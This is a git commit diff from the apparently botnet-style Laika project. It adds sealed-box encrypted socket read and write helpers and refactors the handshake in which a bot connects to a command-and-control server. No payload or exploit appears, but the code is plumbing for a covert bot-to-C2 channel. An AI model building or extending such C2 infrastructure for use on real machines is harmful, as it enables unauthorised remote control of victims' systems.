1
0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-24 13:31:05 +00:00

Added laikaS_readENC laikaS_writeENC, minor refactoring

This commit is contained in:
CPunch 2022-01-29 00:26:15 -06:00
parent 8627f5b85d
commit 56c6db1d62
8 changed files with 43 additions and 24 deletions

View File

@ -4,7 +4,7 @@
#include "bot.h" #include "bot.h"
LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = { LAIKAPKT_SIZE laikaB_pktSizeTbl[LAIKAPKT_MAXNONE] = {
[LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE [LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE)
}; };
void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
@ -12,12 +12,12 @@ void laikaB_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
switch (id) { switch (id) {
case LAIKAPKT_HANDSHAKE_RES: { case LAIKAPKT_HANDSHAKE_RES: {
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE]; uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)], nonce[LAIKA_NONCESIZE];
uint8_t endianness = laikaS_readByte(&peer->sock); uint8_t endianness = laikaS_readByte(&peer->sock);
/* read & decrypt nonce */ /* read & decrypt nonce */
laikaS_read(&peer->sock, encNonce, sizeof(encNonce)); laikaS_read(&peer->sock, encNonce, sizeof(encNonce));
if (crypto_box_seal_open(nonce, encNonce, crypto_box_SEALBYTES + LAIKA_NONCESIZE, bot->pub, bot->priv) != 0) if (crypto_box_seal_open(nonce, encNonce, LAIKAENC_SIZE(LAIKA_NONCESIZE), bot->pub, bot->priv) != 0)
LAIKA_ERROR("Failed to decrypt nonce!\n"); LAIKA_ERROR("Failed to decrypt nonce!\n");
/* check nonce */ /* check nonce */
@ -57,6 +57,7 @@ struct sLaika_bot *laikaB_newBot(void) {
LAIKA_ERROR("Failed to gen keypair!\n"); LAIKA_ERROR("Failed to gen keypair!\n");
} }
/* read cnc's public key into peerPub */
if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) { if (sodium_hex2bin(bot->peer->peerPub, crypto_box_PUBLICKEYBYTES, LAIKA_PUBKEY, strlen(LAIKA_PUBKEY), NULL, &_unused, NULL) != 0) {
laikaB_freeBot(bot); laikaB_freeBot(bot);
LAIKA_ERROR("Failed to init cnc public key!\n"); LAIKA_ERROR("Failed to init cnc public key!\n");
@ -74,7 +75,6 @@ void laikaB_freeBot(struct sLaika_bot *bot) {
} }
void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) { void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE];
struct sLaika_socket *sock = &bot->peer->sock; struct sLaika_socket *sock = &bot->peer->sock;
/* setup socket */ /* setup socket */
@ -83,16 +83,12 @@ void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
laikaP_addSock(&bot->pList, sock); laikaP_addSock(&bot->pList, sock);
/* encrypt nonce using cnc's pubkey */
if (crypto_box_seal(encNonce, bot->nonce, sizeof(bot->nonce), bot->peer->peerPub) != 0)
LAIKA_ERROR("Failed to enc nonce!\n");
/* queue handshake request */ /* queue handshake request */
laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ); laikaS_writeByte(sock, LAIKAPKT_HANDSHAKE_REQ);
laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN); laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN);
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR); laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
laikaS_writeByte(sock, LAIKA_VERSION_MINOR); laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
laikaS_write(sock, encNonce, sizeof(encNonce)); /* write encrypted nonce test */ laikaS_writeENC(sock, bot->nonce, LAIKA_NONCESIZE, bot->peer->peerPub); /* write encrypted nonce test */
laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */ laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */
if (!laikaS_handlePeerOut(bot->peer)) if (!laikaS_handlePeerOut(bot->peer))

View File

@ -12,11 +12,11 @@ int main(int argv, char **argc) {
/* while connection is still alive, poll bot */ /* while connection is still alive, poll bot */
while (laikaS_isAlive((&bot->peer->sock))) { while (laikaS_isAlive((&bot->peer->sock))) {
if (!laikaB_poll(bot, 1000)) { if (!laikaB_poll(bot, 1000)) {
printf("no events!\n"); LAIKA_DEBUG("no events!\n");
} }
} }
laikaB_freeBot(bot); laikaB_freeBot(bot);
printf("bot killed\n"); LAIKA_DEBUG("bot killed\n");
return 0; return 0;
} }

View File

@ -6,7 +6,7 @@
#include "cnc.h" #include "cnc.h"
LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = { LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
[LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + crypto_box_SEALBYTES + LAIKA_NONCESIZE + crypto_box_PUBLICKEYBYTES [LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + LAIKAENC_SIZE(LAIKA_NONCESIZE) + crypto_box_PUBLICKEYBYTES
}; };
void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) { void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
@ -15,7 +15,7 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
switch (id) { switch (id) {
case LAIKAPKT_HANDSHAKE_REQ: { case LAIKAPKT_HANDSHAKE_REQ: {
char magicBuf[LAIKA_MAGICLEN]; char magicBuf[LAIKA_MAGICLEN];
uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE], nonce[LAIKA_NONCESIZE]; uint8_t nonce[LAIKA_NONCESIZE];
uint8_t major, minor; uint8_t major, minor;
laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN); laikaS_read(&peer->sock, (void*)magicBuf, LAIKA_MAGICLEN);
@ -28,21 +28,15 @@ void laikaC_pktHandler(struct sLaika_peer *peer, LAIKAPKT_ID id, void *uData) {
LAIKA_ERROR("invalid handshake request!\n"); LAIKA_ERROR("invalid handshake request!\n");
/* read & decrypt nonce */ /* read & decrypt nonce */
laikaS_read(&peer->sock, encNonce, sizeof(encNonce)); laikaS_readENC(&peer->sock, nonce, LAIKA_NONCESIZE, cnc->pub, cnc->priv);
if (crypto_box_seal_open(nonce, encNonce, sizeof(encNonce), cnc->pub, cnc->priv) != 0)
LAIKA_ERROR("Failed to decrypt nonce!\n");
/* read peer's public key */ /* read peer's public key */
laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub)); laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub));
/* encrypt decrypted nonce with peer's pub key */
if (crypto_box_seal(encNonce, nonce, sizeof(nonce), peer->peerPub) != 0)
LAIKA_ERROR("Failed to enc nonce!\n");
/* queue response */ /* queue response */
laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES); laikaS_writeByte(&peer->sock, LAIKAPKT_HANDSHAKE_RES);
laikaS_writeByte(&peer->sock, laikaS_isBigEndian()); laikaS_writeByte(&peer->sock, laikaS_isBigEndian());
laikaS_write(&peer->sock, encNonce, sizeof(encNonce)); laikaS_writeENC(&peer->sock, nonce, LAIKA_NONCESIZE, peer->peerPub); /* encrypt nonce with peer's public key */
LAIKA_DEBUG("accepted handshake from peer %x\n", peer); LAIKA_DEBUG("accepted handshake from peer %x\n", peer);
break; break;

View File

@ -14,15 +14,19 @@ enum {
* uint8_t laikaMagic[LAIKA_MAGICLEN]; * uint8_t laikaMagic[LAIKA_MAGICLEN];
* uint8_t majorVer; * uint8_t majorVer;
* uint8_t minorVer; * uint8_t minorVer;
* uint8_t encNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using shared pubKey * uint8_t encNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using shared pubKey
* uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with * uint8_t pubKey[crypto_box_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
*/ */
LAIKAPKT_HANDSHAKE_RES, LAIKAPKT_HANDSHAKE_RES,
/* layout of LAIKAPKT_HANDSHAKE_RES: /* layout of LAIKAPKT_HANDSHAKE_RES:
* uint8_t endian; * uint8_t endian;
* uint8_t reEncryptedNonce[crypto_box_SEALBYTES + LAIKA_NONCESIZE]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt * uint8_t reEncryptedNonce[LAIKAENC_SIZE(LAIKA_NONCESIZE)]; -- encrypted using received pubKey from LAIKAPKT_AUTH_REQ pkt
*/ */
LAIKAPKT_VARPKT_REQ, LAIKAPKT_VARPKT_REQ,
/* layout of LAIKAPKT_VARPKT_REQ:
* uint8_t pktID;
* uint16_t pktSize;
*/
LAIKAPKT_MAXNONE LAIKAPKT_MAXNONE
}; };

View File

@ -3,4 +3,6 @@
#include "sodium.h" #include "sodium.h"
#define LAIKAENC_SIZE(sz) (sz + crypto_box_SEALBYTES)
#endif #endif

View File

@ -86,6 +86,8 @@ bool laikaS_setNonBlock(struct sLaika_socket *sock);
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */ void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */
void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */
void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub); /* encrypts & writes from buf */
void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv); /* decrypts & reads to buf */
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data); void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data);
uint8_t laikaS_readByte(struct sLaika_socket *sock); uint8_t laikaS_readByte(struct sLaika_socket *sock);
void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */ void laikaS_readInt(struct sLaika_socket *sock, void *buf, size_t sz); /* reads INT, respecting endianness */

View File

@ -58,9 +58,10 @@ bool laikaS_handlePeerIn(struct sLaika_peer *peer) {
if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE)) if (recvd != sizeof(uint8_t) + sizeof(LAIKAPKT_SIZE))
LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ") LAIKA_ERROR("couldn't read whole LAIKAPKT_VARPKT_REQ")
/* read pktID */
peer->pktID = laikaS_readByte(&peer->sock); peer->pktID = laikaS_readByte(&peer->sock);
/* sanity check packet ID, (check valid range, check it's variadic) */ /* sanity check pktID, (check valid range, check it's variadic) */
if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID]) if (peer->pktID >= LAIKAPKT_MAXNONE || peer->pktSizeTable[peer->pktID])
LAIKA_ERROR("received evil pktID!\n") LAIKA_ERROR("received evil pktID!\n")

View File

@ -3,6 +3,7 @@
#include "lerror.h" #include "lerror.h"
#include "lmem.h" #include "lmem.h"
#include "lpolllist.h" #include "lpolllist.h"
#include "lrsa.h"
#include "lsocket.h" #include "lsocket.h"
static int _LNSetup = 0; static int _LNSetup = 0;
@ -184,6 +185,25 @@ void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz) {
sock->outCount += sz; sock->outCount += sz;
} }
void laikaS_writeENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub) {
/* make sure we have enough space to encrypt the buffer */
laikaM_growarray(uint8_t, sock->outBuf, LAIKAENC_SIZE(sz), sock->outCount, sock->outCap);
/* encrypt the buffer into outBuf */
if (crypto_box_seal(&sock->outBuf[sock->outCount], buf, sz, pub) != 0)
LAIKA_ERROR("Failed to encrypt!");
sock->outCount += LAIKAENC_SIZE(sz);
}
void laikaS_readENC(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub, uint8_t *priv) {
/* decrypt into buf */
if (crypto_box_seal_open(buf, sock->inBuf, LAIKAENC_SIZE(sz), pub, priv) != 0)
LAIKA_ERROR("Failed to decrypt!");
laikaM_rmvarray(uint8_t, sock->inBuf, sock->inCount, 0, LAIKAENC_SIZE(sz));
}
void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) { void laikaS_writeByte(struct sLaika_socket *sock, uint8_t data) {
laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap); laikaM_growarray(uint8_t, sock->outBuf, 1, sock->outCount, sock->outCap);
sock->outBuf[sock->outCount++] = data; sock->outBuf[sock->outCount++] = data;